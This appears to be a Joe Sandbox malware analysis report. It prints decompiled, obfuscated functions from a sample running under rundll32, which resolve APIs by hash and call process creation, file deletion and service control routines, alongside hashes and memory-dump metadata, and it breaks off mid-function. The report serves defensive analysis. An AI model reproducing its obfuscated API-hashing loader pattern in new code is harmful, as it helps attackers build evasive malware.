API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 50e917cd7e31e9e7e486bca62e61bbc207241d3e930c3c3ad67c4d2f233eca68
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: FB016DB6D0130CFBDF04DF94C94A5DEBBB1EF54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00394859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00394859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E003A07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0039485e
0x0039487a
0x0039487d
0x00394884
0x0039488b
0x00394892
0x0039489d
0x003948a0
0x003948ad
0x003948b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 003948B7

Strings

[, xrefs: 0039488B

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: f01525df3cc67b8349bc939d6b1e3cf124fc306172013d38cf56d020701b6b3e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 57F017B0A05209FBDB08CFE8CA5699EBFB9EB40301F20818CE444BB290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 003A4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E003A4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0039602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E003A07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x003a4f80
0x003a4f81
0x003a4f82
0x003a4f86
0x003a4f87
0x003a4f8c
0x003a4fa5
0x003a4fa8
0x003a4faf
0x003a4fb6
0x003a4fc7
0x003a4fca
0x003a4fd7
0x003a4fe2
0x003a4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 003A4FE2

Strings

{#lm, xrefs: 003A4FC2

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: cb73105352716851fceee544bbec590c50472b30b944364265f1a8031d362759
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 9BF037B081120CFFDF09DFA4D98289EBFBAEB40300F208199E805BB250D3725B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 003A976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E003A976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0039602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E003A07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x003a9772
0x003a9773
0x003a9778
0x003a977a
0x003a977b
0x003a977e
0x003a977f
0x003a9782
0x003a9785
0x003a9788
0x003a9789
0x003a978c
0x003a978f
0x003a9790
0x003a9791
0x003a9794
0x003a9797
0x003a979a
0x003a979d
0x003a97a0
0x003a97a3
0x003a97a6
0x003a97a7
0x003a97a8
0x003a97ad
0x003a97b7
0x003a97c3
0x003a97ca
0x003a97d1
0x003a97d8
0x003a97df
0x003a97e3
0x003a97fc
0x003a9816
0x003a981d

APIs

CreateProcessW.KERNEL32(0039591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0039591A), ref: 003A9816

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 6380ccf2962977a2a466f1f2346693fbaff888ead6cf9642a0c6d48ae8fcf048
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2911B072901188BBDF1A9F96DC0ACDF7F7AEF89750F108148FA1556120D2738A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0039B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0039B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0039602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E003A07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0039b569
0x0039b56a
0x0039b56d
0x0039b572
0x0039b574
0x0039b577
0x0039b57a
0x0039b57d
0x0039b580
0x0039b583
0x0039b586
0x0039b587
0x0039b58a
0x0039b58d
0x0039b590
0x0039b593
0x0039b594
0x0039b595
0x0039b59a
0x0039b5a4
0x0039b5b8
0x0039b5c0
0x0039b5c4
0x0039b5cb
0x0039b5d2
0x0039b5d9
0x0039b5e6
0x0039b5fd
0x0039b604

APIs

CreateFileW.KERNELBASE(003A0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,003A0668,?,?,?,?), ref: 0039B5FD

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 0e8e0abe98aa20b6faa5f4c7270ea2e2b2119a56f9ab35472faf1fd3b580c5ec
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0011C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1866120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 003A981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E003A981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0039602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E003A07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x003a9821
0x003a9822
0x003a9825
0x003a9828
0x003a982a
0x003a982c
0x003a982f
0x003a9832
0x003a9835
0x003a9836
0x003a9837
0x003a983c
0x003a9855
0x003a9858
0x003a985f
0x003a9866
0x003a986d
0x003a9874
0x003a987b
0x003a988e
0x003a989b
0x003a98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,003987F2,0000CAAE,0000510C,AD82F196), ref: 003A989B

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: ae4cdaf757c6c5cb0d33e3a3713c065da5a9e29f0ad99fb5f880e03ee38d0130
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: A0015A76801208FBDF08EFD5D846CDFBF79EF85750F108199F918A6220E6725B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003A7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E003A7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0039602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E003A07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x003a7bf7
0x003a7bf8
0x003a7bfa
0x003a7bfd
0x003a7bff
0x003a7c02
0x003a7c06
0x003a7c07
0x003a7c0f
0x003a7c1d
0x003a7c25
0x003a7c2d
0x003a7c31
0x003a7c38
0x003a7c3f
0x003a7c46
0x003a7c4a
0x003a7c5e
0x003a7c67
0x003a7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 003A7C67

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 52a388133977147471ba8c86fc6c0421c360e08666eb08d553d4288cb3e22b17
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 84014FB190120CFFEB09DF94C84A8DE7BB5EF45314F108198F40567240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0039F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0039F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0039602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E003A07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0039f662
0x0039f663
0x0039f665
0x0039f668
0x0039f66a
0x0039f66d
0x0039f670
0x0039f673
0x0039f677
0x0039f678
0x0039f67d
0x0039f687
0x0039f693
0x0039f69a
0x0039f6a1
0x0039f6a5
0x0039f6a9
0x0039f6b0
0x0039f6c9
0x0039f6d8
0x0039f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0039F6D8

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: b955c62702f833d70fda000b7543d0412df11f1af0da8f98a4fbf5a2a41310b1
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 8C01E5B6901208BBEF059F94DC468DF7F75EB05324F148188F90566250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0039B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0039B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0039602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E003A07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0039b6f3
0x0039b6f8
0x0039b702
0x0039b70b
0x0039b712
0x0039b719
0x0039b720
0x0039b727
0x0039b72e
0x0039b747
0x0039b759
0x0039b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0039B759

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 8971cd047350332af00ecbe7ec5cbdb4d572e0ab0018cc83a03626b3d6d7bc39
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: B5014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA056A190D3B25E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 003AAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E003AAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0039602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E003A07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x003aaa3f
0x003aaa40
0x003aaa41
0x003aaa44
0x003aaa47
0x003aaa4b
0x003aaa4c
0x003aaa51
0x003aaa5b
0x003aaa64
0x003aaa68
0x003aaa6f
0x003aaa76
0x003aaa8d
0x003aaa90
0x003aaa9d
0x003aaaa8
0x003aaaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 003AAAA8

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: c5750e247c945e15a0fa742bcb8d6613bc47915ae61f7628dbebc064d59a4a49
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 9AF069B190020CFFDF08DF94DD4A89EBFB4EB41304F108088F805A6250D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00395FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00395FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0039602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E003A07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00395fb5
0x00395fb6
0x00395fb7
0x00395fbb
0x00395fbc
0x00395fc1
0x00395fcb
0x00395fd7
0x00395fde
0x00395fe5
0x00395ffc
0x00395fff
0x00396006
0x0039600d
0x0039601a
0x00396025
0x0039602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00396025

Memory Dump Source

Source File: 0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp, Offset: 00390000, based on PE: true

Associated: 0000000E.00000002.2099040009.0000000000390000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2099095285.00000000003AC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_390000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: aeb19929bc60c918a7ba4bc2b5973c4d889c3fdfa9632505ef8145508ec7055c
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: CBF04FB0C11208FFDB08DFA0E94789EBFB8EB40300F208198E40AAB260E7725F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2976 Parent PID: 2780 rundll32.exeCOMMON

Executed Functions

Function 00272959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00272959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0027602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002807A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0027295f
0x00272964
0x00272967
0x0027296a
0x0027296d
0x0027296e
0x0027296f
0x00272977
0x00272985
0x0027298a
0x00272992
0x0027299a
0x002729a2
0x002729a9
0x002729b0
0x002729b7
0x002729bb
0x002729cf
0x002729dc
0x002729e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002729DC

Strings

<^, xrefs: 00272977

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 23d533029c3056aabe95aed0a0a9b438db4a3eeeeaaebe737ea5bdb30237e692
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: A8016D72A01108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0027C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0027C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0027602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002807A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0027c6e1
0x0027c6e6
0x0027c6f0
0x0027c6fc
0x0027c703
0x0027c706
0x0027c70d
0x0027c711
0x0027c715
0x0027c71c
0x0027c723
0x0027c72a
0x0027c731
0x0027c738
0x0027c751
0x0027c762
0x0027c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0027C762

Strings

/O, xrefs: 0027C6E6

Memory Dump Source

Source File: 0000000F.00000002.2100172117.0000000000271000.00000020.00000001.sdmp, Offset: 00270000, based on PE: true

Associated: 0000000F.00000002.2100161449.0000000000270000.00000004.00000001.sdmp Download File
Associated: 0000000F.00000002.2100232747.000000000028C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_270000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 4934cc63de34540049d58cd22dfaecafe2c44dd235de8f7cee2a288c4fcd6884
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 8F1133B290222DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00271000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00271000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0027602B(_t33);
				_v16 = _v16 & 0x00000000;
